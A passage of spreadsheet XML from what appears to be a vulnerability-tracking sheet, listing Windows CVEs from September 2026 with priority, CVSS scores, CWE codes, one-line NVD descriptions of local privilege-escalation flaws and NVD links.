      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr"/>
      <c r="Q906" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D907" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F907" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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07" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr"/>
      <c r="Q907" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70574</t>
        </is>
      </c>
      <c r="D908" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F908" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr"/>
      <c r="Q908" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D909" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F909" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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09" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr"/>
      <c r="Q909" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="D910" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F910" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr"/>
      <c r="Q910" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="D911" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F911" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr"/>
      <c r="Q911" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D912" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F912" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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12" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr"/>
      <c r="Q912" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D913" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F913" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K913" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr"/>
      <c r="Q913" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D914" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F914" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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14" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr"/>
      <c r="Q914" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="D915" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F915" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr"/>
      <c r="Q915" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="D916" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr"/>
      <c r="Q916" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D917" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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17" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr"/>
      <c r="Q917" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="D918" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F918" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr"/>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr"/>
      <c r="Q918" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="D919" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F919" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr"/>
      <c r="Q919" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="D920" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F920" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr"/>
      <c r="Q920" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="D921" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F921" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr"/>
      <c r="Q921" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="D922" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F922" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr"/>
      <c r="Q922" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="D923" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F923" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr"/>
      <c r="Q923" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D924" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F924" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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4" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr"/>
      <c r="Q924" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
